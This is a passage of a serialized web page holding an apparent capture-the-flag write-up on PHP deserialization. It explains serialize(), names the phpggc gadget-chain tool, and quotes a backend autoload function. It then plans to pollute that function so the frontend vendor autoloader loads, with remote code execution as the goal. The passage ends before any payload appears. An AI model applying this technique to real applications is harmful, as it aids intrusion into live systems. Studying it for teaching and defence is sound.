structure.",{"type":33,"tag":47,"props":42058,"children":42059},{},[42060],{"type":38,"value":42061},"Example:",{"type":33,"tag":114,"props":42063,"children":42064},{"lang":40629},[42065],{"type":33,"tag":119,"props":42066,"children":42068},{"code":42067,"language":40629,"meta":8,"className":40634,"style":8},"$data = array('name' => 'John',\n              'age' => 30,\n              'email' => 'john@example.com');\n$serialized_data = serialize($data);\n\necho 
$serialized_data;\n'a:3:{s:4:\"name\";s:4:\"John\";s:3:\"age\";i:30;s:5:\"email\";s:17:\"john@example.com\";}'\n",[42069],{"type":33,"tag":105,"props":42070,"children":42071},{"__ignoreMap":8},[42072,42128,42157,42193,42226,42233,42252],{"type":33,"tag":128,"props":42073,"children":42074},{"class":130,"line":131},[42075,42079,42083,42087,42092,42096,42100,42104,42108,42112,42116,42120,42124],{"type":33,"tag":128,"props":42076,"children":42077},{"style":312},[42078],{"type":38,"value":3651},{"type":33,"tag":128,"props":42080,"children":42081},{"style":306},[42082],{"type":38,"value":2815},{"type":33,"tag":128,"props":42084,"children":42085},{"style":312},[42086],{"type":38,"value":5657},{"type":33,"tag":128,"props":42088,"children":42089},{"style":437},[42090],{"type":38,"value":42091}," array",{"type":33,"tag":128,"props":42093,"children":42094},{"style":312},[42095],{"type":38,"value":5566},{"type":33,"tag":128,"props":42097,"children":42098},{"style":676},[42099],{"type":38,"value":6040},{"type":33,"tag":128,"props":42101,"children":42102},{"style":140},[42103],{"type":38,"value":12126},{"type":33,"tag":128,"props":42105,"children":42106},{"style":676},[42107],{"type":38,"value":6040},{"type":33,"tag":128,"props":42109,"children":42110},{"style":300},[42111],{"type":38,"value":5625},{"type":33,"tag":128,"props":42113,"children":42114},{"style":676},[42115],{"type":38,"value":6739},{"type":33,"tag":128,"props":42117,"children":42118},{"style":140},[42119],{"type":38,"value":38051},{"type":33,"tag":128,"props":42121,"children":42122},{"style":676},[42123],{"type":38,"value":6040},{"type":33,"tag":128,"props":42125,"children":42126},{"style":312},[42127],{"type":38,"value":693},{"type":33,"tag":128,"props":42129,"children":42130},{"class":130,"line":362},[42131,42136,42141,42145,42149,42153],{"type":33,"tag":128,"props":42132,"children":42133},{"style":676},[42134],{"type":38,"value":42135},"              
'",{"type":33,"tag":128,"props":42137,"children":42138},{"style":140},[42139],{"type":38,"value":42140},"age",{"type":33,"tag":128,"props":42142,"children":42143},{"style":676},[42144],{"type":38,"value":6040},{"type":33,"tag":128,"props":42146,"children":42147},{"style":300},[42148],{"type":38,"value":5625},{"type":33,"tag":128,"props":42150,"children":42151},{"style":523},[42152],{"type":38,"value":38072},{"type":33,"tag":128,"props":42154,"children":42155},{"style":312},[42156],{"type":38,"value":693},{"type":33,"tag":128,"props":42158,"children":42159},{"class":130,"line":403},[42160,42164,42168,42172,42176,42180,42185,42189],{"type":33,"tag":128,"props":42161,"children":42162},{"style":676},[42163],{"type":38,"value":42135},{"type":33,"tag":128,"props":42165,"children":42166},{"style":140},[42167],{"type":38,"value":29866},{"type":33,"tag":128,"props":42169,"children":42170},{"style":676},[42171],{"type":38,"value":6040},{"type":33,"tag":128,"props":42173,"children":42174},{"style":300},[42175],{"type":38,"value":5625},{"type":33,"tag":128,"props":42177,"children":42178},{"style":676},[42179],{"type":38,"value":6739},{"type":33,"tag":128,"props":42181,"children":42182},{"style":140},[42183],{"type":38,"value":42184},"john@example.com",{"type":33,"tag":128,"props":42186,"children":42187},{"style":676},[42188],{"type":38,"value":6040},{"type":33,"tag":128,"props":42190,"children":42191},{"style":312},[42192],{"type":38,"value":5815},{"type":33,"tag":128,"props":42194,"children":42195},{"class":130,"line":739},[42196,42200,42205,42209,42214,42218,42222],{"type":33,"tag":128,"props":42197,"children":42198},{"style":312},[42199],{"type":38,"value":3651},{"type":33,"tag":128,"props":42201,"children":42202},{"style":306},[42203],{"type":38,"value":42204},"serialized_data",{"type":33,"tag":128,"props":42206,"children":42207},{"style":312},[42208],{"type":38,"value":5657},{"type":33,"tag":128,"props":42210,"children":42211},{"style":437},[42212],{"type":38,"value":42213
}," serialize",{"type":33,"tag":128,"props":42215,"children":42216},{"style":312},[42217],{"type":38,"value":40659},{"type":33,"tag":128,"props":42219,"children":42220},{"style":306},[42221],{"type":38,"value":2815},{"type":33,"tag":128,"props":42223,"children":42224},{"style":312},[42225],{"type":38,"value":5815},{"type":33,"tag":128,"props":42227,"children":42228},{"class":130,"line":765},[42229],{"type":33,"tag":128,"props":42230,"children":42231},{"emptyLinePlaceholder":896},[42232],{"type":38,"value":899},{"type":33,"tag":128,"props":42234,"children":42235},{"class":130,"line":804},[42236,42240,42244,42248],{"type":33,"tag":128,"props":42237,"children":42238},{"style":437},[42239],{"type":38,"value":8671},{"type":33,"tag":128,"props":42241,"children":42242},{"style":312},[42243],{"type":38,"value":40686},{"type":33,"tag":128,"props":42245,"children":42246},{"style":306},[42247],{"type":38,"value":42204},{"type":33,"tag":128,"props":42249,"children":42250},{"style":312},[42251],{"type":38,"value":5676},{"type":33,"tag":128,"props":42253,"children":42254},{"class":130,"line":839},[42255,42259,42264],{"type":33,"tag":128,"props":42256,"children":42257},{"style":676},[42258],{"type":38,"value":6040},{"type":33,"tag":128,"props":42260,"children":42261},{"style":140},[42262],{"type":38,"value":42263},"a:3:{s:4:\"name\";s:4:\"John\";s:3:\"age\";i:30;s:5:\"email\";s:17:\"john@example.com\";}",{"type":33,"tag":128,"props":42265,"children":42266},{"style":676},[42267],{"type":38,"value":10313},{"type":33,"tag":47,"props":42269,"children":42270},{},[42271,42273],{"type":38,"value":42272},"If malicious users can manipulate the serialized data, it can be used to inject malicious code into the unserialized data. This is known as a deserialization vulnerability and can be a serious security issue. 
The best-known repository for generating payloads for deserialization vulnerabilities is ",{"type":33,"tag":53,"props":42274,"children":42277},{"href":42275,"rel":42276},"https://github.com/ambionics/phpggc",[57],[42278],{"type":38,"value":42279},"phpggc (php generic gadget chains)",{"type":33,"tag":40,"props":42281,"children":42283},{"id":42282},"php-gadgets",[42284],{"type":38,"value":42285},"PHP Gadgets",{"type":33,"tag":47,"props":42287,"children":42288},{},[42289,42291,42297],{"type":38,"value":42290},"So we can then use the ",{"type":33,"tag":53,"props":42292,"children":42294},{"href":42275,"rel":42293},[57],[42295],{"type":38,"value":42296},"phpggc",{"type":38,"value":42298}," library, which allows crafting payloads that exploit the deserialization vulnerability.\nphpggc builds its payloads from gadget chains found in well-known libraries such as Monolog, Guzzle, Symfony, Laravel, etc.",{"type":33,"tag":47,"props":42300,"children":42301},{},[42302,42304,42309],{"type":38,"value":42303},"However, we quickly realize that the interesting libraries (in our case ",{"type":33,"tag":2302,"props":42305,"children":42306},{},[42307],{"type":38,"value":42308},"Monolog",{"type":38,"value":42310},") are located in the frontend, while our unserialize call is performed in the backend.\nTherefore, we currently have no way to load the frontend libraries.",{"type":33,"tag":40,"props":42312,"children":42314},{"id":42313},"autoload",[42315],{"type":38,"value":42316},"Autoload",{"type":33,"tag":47,"props":42318,"children":42319},{},[42320,42322,42329],{"type":38,"value":42321},"For this part, we based our work on ",{"type":33,"tag":53,"props":42323,"children":42326},{"href":42324,"rel":42325},"https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable",[57],[42327],{"type":38,"value":42328},"this article",{"type":38,"value":215},{"type":33,"tag":47,"props":42331,"children":42332},{},[42333],{"type":38,"value":42334},"With this deserialization, we can pollute 
the backend's autoloader to include the frontend's autoloader, which will load the library required to achieve an RCE.",{"type":33,"tag":47,"props":42336,"children":42337},{},[42338],{"type":38,"value":42339},"Here is the reaction of my team when I said that on Discord 😂",{"type":33,"tag":32400,"props":42341,"children":42343},{"width":40587,"src":42342},"https://user-images.githubusercontent.com/28403617/227541758-87dcc953-7467-445c-9ed0-1d6bc81ff7e4.png",[],{"type":33,"tag":47,"props":42345,"children":42346},{},[42347],{"type":33,"tag":2302,"props":42348,"children":42349},{},[42350],{"type":38,"value":42351},"What is the autoload function?",{"type":33,"tag":47,"props":42353,"children":42354},{},[42355],{"type":38,"value":42356},"In PHP, \"Autoload\" refers to the automatic loading of PHP classes as needed, without having to manually include the class files. Once the Autoloader function has located the file, it includes it, and the class becomes available for use in the current script. The Autoload mechanism helps to reduce the amount of code you need to write, by automatically loading classes as needed, so you don't have to include them manually in every script. It also simplifies the task of managing dependencies between classes, by allowing you to organize your code into logical namespaces and directories.",{"type":33,"tag":47,"props":42358,"children":42359},{},[42360],{"type":38,"value":42361},"The idea is clear: we need to analyze the function passed to spl_autoload_register in the backend's index.php file.",{"type":33,"tag":47,"props":42363,"children":42364},{},[42365],{"type":38,"value":42366},"spl_autoload_register is a built-in PHP function that lets you register one or more functions (or methods) to be called when a class that is not yet defined is referenced. 
So it's used for including local classes (not for classes from vendor folder).",{"type":33,"tag":114,"props":42368,"children":42369},{"land":40629},[42370],{"type":33,"tag":119,"props":42371,"children":42373},{"code":42372,"language":40629,"meta":8,"className":40634,"style":8},"spl_autoload_register(function ($name) {\n    if (preg_match('/Controller$/', $name)) {\n        $name = \"controllers/${name}\";\n    } elseif (preg_match('/Model$/', $name)) {\n        $name = \"models/${name}\";\n    } elseif (preg_match('/_/', $name)) {\n        $name = preg_replace('/_/', '/', $name);\n    }\n\n    $filename = \"/${name}.php\";\n\n    if (file_exists($filename)) {\n        require $filename;\n    }\n    elseif (file_exists(__DIR__ . $filename)) {\n        require __DIR__ . $filename;\n    }\n});\n",[42374],{"type":33,"tag":105,"props":42375,"children":42376},{"__ignoreMap":8},[42377,42410,42469,42514,42575,42619,42675,42743,42750,42757,42806,42813,42845,42865,42872,42918,42946,42953],{"type":33,"tag":128,"props":42378,"children":42379},{"class":130,"line":131},[42380,42385,42389,42393,42398,42402,42406],{"type":33,"tag":128,"props":42381,"children":42382},{"style":437},[42383],{"type":38,"value":42384},"spl_autoload_register",{"type":33,"tag":128,"props":42386,"children":42387},{"style":312},[42388],{"type":38,"value":5566},{"type":33,"tag":128,"props":42390,"children":42391},{"style":300},[42392],{"type":38,"value":13008},{"type":33,"tag":128,"props":42394,"children":42395},{"style":312},[42396],{"type":38,"value":42397}," 
($",{"type":33,"tag":128,"props":42399,"children":42400},{"style":306},[42401],{"type":38,"value":12126},{"type":33,"tag":128,"props":42403,"children":42404},{"style":312},[42405],{"type":38,"value":2966},{"type":33,"tag":128,"props":42407,"children":42408},{"style":312},[42409],{"type":38,"value":762},{"type":33,"tag":128,"props":42411,"children":42412},{"class":130,"line":362},[42413,42417,42421,42426,42430,42435,42440,42444,42449,42453,42457,42461,42465],{"type":33,"tag":128,"props":42414,"children":42415},{"style":1576},[42416],{"type":38,"value":6625},{"type":33,"tag":128,"props":42418,"children":42419},{"style":312},[42420],{"type":38,"value":2852},{"type":33,"tag":128,"props":42422,"children":42423},{"style":437},[42424],{"type":38,"value":42425},"preg_match",{"type":33,"tag":128,"props":42427,"children":42428},{"style":312},[42429],{"type":38,"value":5566},{"type":33,"tag":128,"props":42431,"children":42432},{"style":676},[42433],{"type":38,"value":42434},"'/",{"type":33,"tag":128,"props":42436,"children":42437},{"style":16561},[42438],{"type":38,"value":42439},"Controller",{"type":33,"tag":128,"props":42441,"children":42442},{"style":300},[42443],{"type":38,"value":3651},{"type":33,"tag":128,"props":42445,"children":42446},{"style":676},[42447],{"type":38,"value":42448},"/'",{"type":33,"tag":128,"props":42450,"children":42451},{"style":312},[42452],{"type":38,"value":5584},{"type":33,"tag":128,"props":42454,"children":42455},{"style":312},[42456],{"type":38,"value":40686},{"type":33,"tag":128,"props":42458,"children":42459},{"style":306},[42460],{"type":38,"value":12126},{"type":33,"tag":128,"props":42462,"children":42463},{"style":312},[42464],{"type":38,"value":7088},{"type":33,"tag":128,"props":42466,"children":42467},{"style":312},[42468],{"type":38,"value":762},{"type":33,"tag":128,"props":42470,"children":42471},{"class":130,"line":403},[42472,42477,42481,42485,42489,42494,42498,42502,42506,42510],{"type":33,"tag":128,"props":42473,"children":42474},{
"style":312},[42475],{"type":38,"value":42476},"        $",{"type":33,"tag":128,"props":42478,"children":42479},{"style":306},[42480],{"type":38,"value":12126},{"type":33,"tag":128,"props":42482,"children":42483},{"style":312},[42484],{"type":38,"value":5657},{"type":33,"tag":128,"props":42486,"children":42487},{"style":676},[42488],{"type":38,"value":679},{"type":33,"tag":128,"props":42490,"children":42491},{"style":140},[42492],{"type":38,"value":42493},"controllers/",{"type":33,"tag":128,"props":42495,"children":42496},{"style":312},[42497],{"type":38,"value":5720},{"type":33,"tag":128,"props":42499,"children":42500},{"style":140},[42501],{"type":38,"value":12126},{"type":33,"tag":128,"props":42503,"children":42504},{"style":312},[42505],{"type":38,"value":5730},{"type":33,"tag":128,"props":42507,"children":42508},{"style":676},[42509],{"type":38,"value":669},{"type":33,"tag":128,"props":42511,"children":42512},{"style":312},[42513],{"type":38,"value":5676},{"type":33,"tag":128,"props":42515,"children":42516},{"class":130,"line":739},[42517,42521,42526,42530,42534,42538,42542,42547,42551,42555,42559,42563,42567,42571],{"type":33,"tag":128,"props":42518,"children":42519},{"style":312},[42520],{"type":38,"value":14264},{"type":33,"tag":128,"props":42522,"children":42523},{"style":1576},[42524],{"type":38,"value":42525}," 
elseif",{"type":33,"tag":128,"props":42527,"children":42528},{"style":312},[42529],{"type":38,"value":2852},{"type":33,"tag":128,"props":42531,"children":42532},{"style":437},[42533],{"type":38,"value":42425},{"type":33,"tag":128,"props":42535,"children":42536},{"style":312},[42537],{"type":38,"value":5566},{"type":33,"tag":128,"props":42539,"children":42540},{"style":676},[42541],{"type":38,"value":42434},{"type":33,"tag":128,"props":42543,"children":42544},{"style":16561},[42545],{"type":38,"value":42546},"Model",{"type":33,"tag":128,"props":42548,"children":42549},{"style":300},[42550],{"type":38,"value":3651},{"type":33,"tag":128,"props":42552,"children":42553},{"style":676},[42554],{"type":38,"value":42448},{"type":33,"tag":128,"props":42556,"children":42557},{"style":312},[42558],{"type":38,"value":5584},{"type":33,"tag":128,"props":42560,"children":42561},{"style":312},[42562],{"type":38,"value":40686},{"type":33,"tag":128,"props":42564,"children":42565},{"style":306},[42566],{"type":38,"value":12126},{"type":33,"tag":128,"props":42568,"children":42569},{"style":312},[42570],{"type":38,"value":7088},{"type":33,"tag":128,"props":42572,"children":42573},{"style":312},[42574],{"type":38,"value":762},{"type":33,"tag":128,"props":42576,"children":42577},{"class":130,"line":765},[42578,42582,42586,42590,42594,42599,42603,42607,42611,42615],{"type":33,"tag":128,"props":42579,"children":42580},{"style":312},[42581],{"type":38,"value":42476},{"type":33,"tag":128,"props":42583,"children":42584},{"style":306},[42585],{"type":38,"value":12126},{"type":33,"tag":128,"props":42587,"children":42588},{"style":312},[42589],{"type":38,"value":5657},{"type":33,"tag":128,"props":42591,"children":42592},{"style":676},[42593],{"type":38,"value":679},{"type":33,"tag":128,"props":42595,"children":42596},{"style":140},[42597],{"type":38,"value":42598},"models/",{"type":33,"tag":128,"props":42600,"children":42601},{"style":312},[42602],{"type":38,"value":5720},{"type":33,"tag":128,"pro
ps":42604,"children":42605},{"style":140},[42606],{"type":38,"value":12126},{"type":33,"tag":128,"props":42608,"children":42609},{"style":312},[42610],{"type":38,"value":5730},{"type":33,"tag":128,"props":42612,"children":42613},{"style":676},[42614],{"type":38,"value":669},{"type":33,"tag":128,"props":42616,"children":42617},{"style":312},[42618],{"type":38,"value":5676},{"type":33,"tag":128,"props":42620,"children":42621},{"class":130,"line":804},[42622,42626,42630,42634,42638,42642,42646,42651,42655,42659,42663,42667,42671],{"type":33,"tag":128,"props":42623,"children":42624},{"style":312},[42625],{"type":38,"value":14264},{"type":33,"tag":128,"props":42627,"children":42628},{"style":1576},[42629],{"type":38,"value":42525},{"type":33,"tag":128,"props":42631,"children":42632},{"style":312},[42633],{"type":38,"value":2852},{"type":33,"tag":128,"props":42635,"children":42636},{"style":437},[42637],{"type":38,"value":42425},{"type":33,"tag":128,"props":42639,"children":42640},{"style":312},[42641],{"type":38,"value":5566},{"type":33,"tag":128,"props":42643,"children":42644},{"style":676},[42645],{"type":38,"value":42434},{"type":33,"tag":128,"props":42647,"children":42648},{"style":16561},[42649],{"type":38,"value":42650},"_",{"type":33,"tag":128,"props":42652,"children":42653},{"style":676},[42654],{"type":38,"value":42448},{"type":33,"tag":128,"props":42656,"children":42657},{"style":312},[42658],{"type":38,"value":5584},{"type":33,"tag":128,"props":42660,"children":42661},{"style":312},[42662],{"type":38,"value":40686},{"type":33,"tag":128,"props":42664,"children":42665},{"style":306},[42666],{"type":38,"value":12126},{"type":33,"tag":128,"props":42668,"children":42669},{"style":312},[42670],{"type":38,"value":7088},{"type":33,"tag":128,"props":42672,"children":42673},{"style":312},[42674],{"type":38,"value":762},{"type":33,"tag":128,"props":42676,"children":42677},{"class":130,"line":839},[42678,42682,42686,42690,42695,42699,42703,42707,42711,42715,42719,42723,42
727,42731,42735,42739],{"type":33,"tag":128,"props":42679,"children":42680},{"style":312},[42681],{"type":38,"value":42476},{"type":33,"tag":128,"props":42683,"children":42684},{"style":306},[42685],{"type":38,"value":12126},{"type":33,"tag":128,"props":42687,"children":42688},{"style":312},[42689],{"type":38,"value":5657},{"type":33,"tag":128,"props":42691,"children":42692},{"style":437},[42693],{"type":38,"value":42694}," preg_replace",{"type":33,"tag":128,"props":42696,"children":42697},{"style":312},[42698],{"type":38,"value":5566},{"type":33,"tag":128,"props":42700,"children":42701},{"style":676},[42702],{"type":38,"value":42434},{"type":33,"tag":128,"props":42704,"children":42705},{"style":16561},[42706],{"type":38,"value":42650},{"type":33,"tag":128,"props":42708,"children":42709},{"style":676},[42710],{"type":38,"value":42448},{"type":33,"tag":128,"props":42712,"children":42713},{"style":312},[42714],{"type":38,"value":5584},{"type":33,"tag":128,"props":42716,"children":42717},{"style":676},[42718],{"type":38,"value":6739},{"type":33,"tag":128,"props":42720,"children":42721},{"style":140},[42722],{"type":38,"value":7367},{"type":33,"tag":128,"props":42724,"children":42725},{"style":676},[42726],{"type":38,"value":6040},{"type":33,"tag":128,"props":42728,"children":42729},{"style":312},[42730],{"type":38,"value":5584},{"type":33,"tag":128,"props":42732,"children":42733},{"style":312},[42734],{"type":38,"value":40686},{"type":33,"tag":128,"props":42736,"children":42737},{"style":306},[42738],{"type":38,"value":12126},{"type":33,"tag":128,"props":42740,"children":42741},{"style":312},[42742],{"type":38,"value":5815},{"type":33,"tag":128,"props":42744,"children":42745},{"class":130,"line":848},[42746],{"type":33,"tag":128,"props":42747,"children":42748},{"style":312},[42749],{"type":38,"value":6760},{"type":33,"tag":128,"props":42751,"children":42752},{"class":130,"line":976},[42753],{"type":33,"tag":128,"props":42754,"children":42755},{"emptyLinePlaceholder":89
6},[42756],{"type":38,"value":899},{"type":33,"tag":128,"props":42758,"children":42759},{"class":130,"line":988},[42760,42764,42769,42773,42777,42781,42785,42789,42793,42798,42802],{"type":33,"tag":128,"props":42761,"children":42762},{"style":312},[42763],{"type":38,"value":41832},{"type":33,"tag":128,"props":42765,"children":42766},{"style":306},[42767],{"type":38,"value":42768},"filename",{"type":33,"tag":128,"props":42770,"children":42771},{"style":312},[42772],{"type":38,"value":5657},{"type":33,"tag":128,"props":42774,"children":42775},{"style":676},[42776],{"type":38,"value":679},{"type":33,"tag":128,"props":42778,"children":42779},{"style":140},[42780],{"type":38,"value":7367},{"type":33,"tag":128,"props":42782,"children":42783},{"style":312},[42784],{"type":38,"value":5720},{"type":33,"tag":128,"props":42786,"children":42787},{"style":140},[42788],{"type":38,"value":12126},{"type":33,"tag":128,"props":42790,"children":42791},{"style":312},[42792],{"type":38,"value":5730},{"type":33,"tag":128,"props":42794,"children":42795},{"style":140},[42796],{"type":38,"value":42797},".php",{"type":33,"tag":128,"props":42799,"children":42800},{"style":676},[42801],{"type":38,"value":669},{"type":33,"tag":128,"props":42803,"children":42804},{"style":312},[42805],{"type":38,"value":5676},{"type":33,"tag":128,"props":42807,"children":42808},{"class":130,"line":1001},[42809],{"type":33,"tag":128,"props":42810,"children":42811},{"emptyLinePlaceholder":896},[42812],{"type":38,"value":899},{"type":33,"tag":128,"props":42814,"children":42815},{"class":130,"line":1014},[42816,42820,42824,42829,42833,42837,42841],{"type":33,"tag":128,"props":42817,"children":42818},{"style":1576},[42819],{"type":38,"value":6625},{"type":33,"tag":128,"props":42821,"children":42822},{"style":312},[42823],{"type":38,"value":2852},{"type":33,"tag":128,"props":42825,"children":42826},{"style":437},[42827],{"type":38,"value":42828},"file_exists",{"type":33,"tag":128,"props":42830,"children":42831},{"styl
e":312},[42832],{"type":38,"value":40659},{"type":33,"tag":128,"props":42834,"children":42835},{"style":306},[42836],{"type":38,"value":42768},{"type":33,"tag":128,"props":42838,"children":42839},{"style":312},[42840],{"type":38,"value":7088},{"type":33,"tag":128,"props":42842,"children":42843},{"style":312},[42844],{"type":38,"value":762},{"type":33,"tag":128,"props":42846,"children":42847},{"class":130,"line":1026},[42848,42853,42857,42861],{"type":33,"tag":128,"props":42849,"children":42850},{"style":1576},[42851],{"type":38,"value":42852},"        require",{"type":33,"tag":128,"props":42854,"children":42855},{"style":312},[42856],{"type":38,"value":40686},{"type":33,"tag":128,"props":42858,"children":42859},{"style":306},[42860],{"type":38,"value":42768},{"type":33,"tag":128,"props":42862,"children":42863},{"style":312},[42864],{"type":38,"value":5676},{"type":33,"tag":128,"props":42866,"children":42867},{"class":130,"line":1038},[42868],{"type":33,"tag":128,"props":42869,"children":42870},{"style":312},[42871],{"type":38,"value":6760},{"type":33,"tag":128,"props":42873,"children":42874},{"class":130,"line":1051},[42875,42880,42884,42888,42892,42897,42902,42906,42910,42914],{"type":33,"tag":128,"props":42876,"children":42877},{"style":1576},[42878],{"type":38,"value":42879},"    elseif",{"type":33,"tag":128,"props":42881,"children":42882},{"style":312},[42883],{"type":38,"value":2852},{"type":33,"tag":128,"props":42885,"children":42886},{"style":437},[42887],{"type":38,"value":42828},{"type":33,"tag":128,"props":42889,"children":42890},{"style":312},[42891],{"type":38,"value":5566},{"type":33,"tag":128,"props":42893,"children":42894},{"style":1576},[42895],{"type":38,"value":42896},"__DIR__",{"type":33,"tag":128,"props":42898,"children":42899},{"style":300},[42900],{"type":38,"value":42901}," 
.",{"type":33,"tag":128,"props":42903,"children":42904},{"style":312},[42905],{"type":38,"value":40686},{"type":33,"tag":128,"props":42907,"children":42908},{"style":306},[42909],{"type":38,"value":42768},{"type":33,"tag":128,"props":42911,"children":42912},{"style":312},[42913],{"type":38,"value":7088},{"type":33,"tag":128,"props":42915,"children":42916},{"style":312},[42917],{"type":38,"value":762},{"type":33,"tag":128,"props":42919,"children":42920},{"class":130,"line":1063},[42921,42925,42930,42934,42938,42942],{"type":33,"tag":128,"props":42922,"children":42923},{"style":1576},[42924],{"type":38,"value":42852},{"type":33,"tag":128,"props":42926,"children":42927},{"style":1576},[42928],{"type":38,"value":42929}," __DIR__",{"type":33,"tag":128,"props":42931,"children":42932},{"style":300},[42933],{"type":38,"value":42901},{"type":33,"tag":128,"props":42935,"children":42936},{"style":312},[42937],{"type":38,"value":40686},{"type":33,"tag":128,"props":42939,"children":42940},{"style":306},[42941],{"type":38,"value":42768},{"type":33,"tag":128,"props":42943,"children":42944},{"style":312},[42945],{"type":38,"value":5676},{"type":33,"tag":128,"props":42947,"children":42948},{"class":130,"line":1076},[42949],{"type":33,"tag":128,"props":42950,"children":42951},{"style":312},[42952],{"type":38,"value":6760},{"type":33,"tag":128,"props":42954,"children":42955},{"class":130,"line":1089},[42956],{"type":33,"tag":128,"props":42957,"children":42958},{"style":312},[42959],{"type":38,"value":5902},{"type":33,"tag":47,"props":42961,"children":42962},{},[42963],{"type":38,"value":42964},"Our goal here will be to pollute this function in order to allow loading the file /www/frontend/vendor/autoload.php. 
Because /www/frontend/vendor/autoload.php will load all the classes from the frontend vendor folder.",{"type":33,"tag":47,"props":42966,"children":42967},{},[42968],{"type":38,"value":42969},"For this, we need to create a serialized string that meets the expectations of the function. If our serialized string loads a class, it will go through this function.",{"type":33,"tag":47,"props":42971,"children":42972},{},[42973],{"type":38,"value":42974},"We can see that this function performs preg_replace, when adding the character '_' and replaces it with a '/'.",{"type":33,"tag":114,"props":42976,"children":42977},{"land":40629},[42978],{"type":33,"tag":119,"props":42979,"children":42981},{"code":42980,"language":40629,"meta":8,"className":40634,"style":8},"elseif (preg_match('/_/', $name)) {\n  $name = preg_replace('/_/', '/', $name);\n}\n",[42982],{"type":33,"tag":105,"props":42983,"children":42984},{"__ignoreMap":8},[42985,43037,43105],{"type":33,"tag":128,"props":42986,"children":42987},{"class":130,"line":131},[42988,42993,42997,43001,43005,43009,43013,43017,43021,43025,43029,43033],{"type":33,"tag":128,"props":42989,"children":42990},{"style":1576},[42991],{"type":38,"value":42992},"elseif",{"type":33,"tag":128,"props":42994,"children":42995},{"style":312},[42996],{"type":38,"value":2852},{"type":33,"tag":128,"props":42998,"children":42999},{"style":437},[43000],{"type":38,"value":42425},{"type":33,"tag":128,"props":43002,"children":43003},{"style":312},[43004],{"type":38,"value":5566},{"type":33,"tag":128,"props":43006,"children":43007},{"style":676},[43008],{"type":38,"value":42434},{"type":33,"tag":128,"props":43010,"children":43011},{"style":16561},[43012],{"type":38,"value":42650},{"type":33,"tag":128,"props":43014,"children":43015},{"style":676},[43016],{"type":38,"value":42448},{"type":33,"tag":128,"props":43018,"children":43019},{"style":312},[43020],{"type":38,"value":5584},{"type":33,"tag":128,"props":43022,"children":43023},{"style":312},[43024],{"type":38
,"value":40686},{"type":33,"tag":128,"props":43026,"children":43027},{"style":306},[43028],{"type":38,"value":12126},{"type":33,"tag":128,"props":43030,"children":43031},{"style":312},[43032],{"type":38,"value":7088},{"type":33,"tag":128,"props":43034,"children":43035},{"style":312},[43036],{"type":38,"value":762},{"type":33,"tag":128,"props":43038,"children":43039},{"class":130,"line":362},[43040,43045,43049,43053,43057,43061,43065,43069,43073,43077,43081,43085,43089,43093,43097,43101],{"type":33,"tag":128,"props":43041,"children":43042},{"style":312},[43043],{"type":38,"value":43044},"  $",{"type":33,"tag":128,"props":43046,"children":43047},{"style":306},[43048],{"type":38,"value":12126},{"type":33,"tag":128,"props":43050,"children":43051},{"style":312},[43052],{"type":38,"value":5657},{"type":33,"tag":128,"props":43054,"children":43055},{"style":437},[43056],{"type":38,"value":42694},{"type":33,"tag":128,"props":43058,"children":43059},{"style":312},[43060],{"type":38,"value":5566},{"type":33,"tag":128,"props":43062,"children":43063},{"style":676},[43064],{"type":38,"value":42434},{"type":33,"tag":128,"props":43066,"children":43067},{"style":16561},[43068],{"type":38,"value":42650},{"type":33,"tag":128,"props":43070,"children":43071},{"style":676},[43072],{"type":38,"value":42448},{"type":33,"tag":128,"props":43074,"children":43075},{"style":312},[43076],{"type":38,"value":5584},{"type":33,"tag":128,"props":43078,"children":43079},{"style":676},[43080],{"type":38,"value":6739},{"type":33,"tag":128,"props":43082,"children":43083},{"style":140},[43084],{"type":38,"value":7367},{"type":33,"tag":128,"props":43086,"children":43087},{"style":676},[43088],{"type":38,"value":6040},{"type":33,"tag":128,"props":43090,"children":43091},{"style":312},[43092],{"type":38,"value":5584},{"type":33,"tag":128,"props":43094,"children":43095},{"style":312},[43096],{"type":38,"value":40686},{"type":33,"tag":128,"props":43098,"children":43099},{"style":306},[43100],{"type":38,"value"
:12126},{"type":33,"tag":128,"props":43102,"children":43103},{"style":312},[43104],{"type":38,"value":5815},{"type":33,"tag":128,"props":43106,"children":43107},{"class":130,"line":403},[43108],{"type":33,"tag":128,"props":43109,"children":43110},{"style":312},[43111],{"type":38,"value":854},{"type":33,"tag":47,"props":43113,"children":43114},{},[43115],{"type":38,"value":43116},"And then this function adds a / at the beginning of the file name.",{"type":33,"tag":114,"props":43118,"children":43119},{"land":40629},[43120],{"type":33,"tag":119,"props":43121,"children":43123},{"code":43122,"language":40629,"meta":8,"className":40634,"style":8},"$filename = \"/${name}.php\";\n",[43124],{"type":33,"tag":105,"props":43125,"children":43126},{"__ignoreMap":8},[43127],{"type":33,"tag":128,"props":43128,"children":43129},{"class":130,"line":131},[43130,43134,43138,43142,43146,43150,43154,43158,43162,43166,43170],{"type":33,"tag":128,"props":43131,"children":43132},{"style":312},[43133],{"type":38,"value":3651},{"type":33,"tag":128,"props":43135,"children":43136},{"style":306},[43137],{"type":38,"value":42768},{"type":33,"tag":128,"props":43139,"children":43140},{"style":312},[43141],{"type":38,"value":5657},{"type":33,"tag":128,"props":43143,"children":43144},{"style":676},[43145],{"type":38,"value":679},{"type":33,"tag":128,"props":43147,"children":43148},{"style":140},[43149],{"type":38,"value":7367},{"type":33,"tag":128,"props":43151,"children":43152},{"style":312},[43153],{"type":38,"value":5720},{"type":33,"tag":128,"props":43155,"children":43156},{"style":140},[43157],{"type":38,"value":12126},{"type":33,"tag":128,"props":43159,"children":43160},{"style":312},[43161],{"type":38,"value":5730},{"type":33,"tag":128,"props":43163,"children":43164},{"style":140},[43165],{"type":38,"value":42797},{"type":33,"tag":128,"props":43167,"children":43168},{"style":676},[43169],{"type":38,"value":669},{"type":33,"tag":128,"props":43171,"children":43172},{"style":312},[43173],{"type":
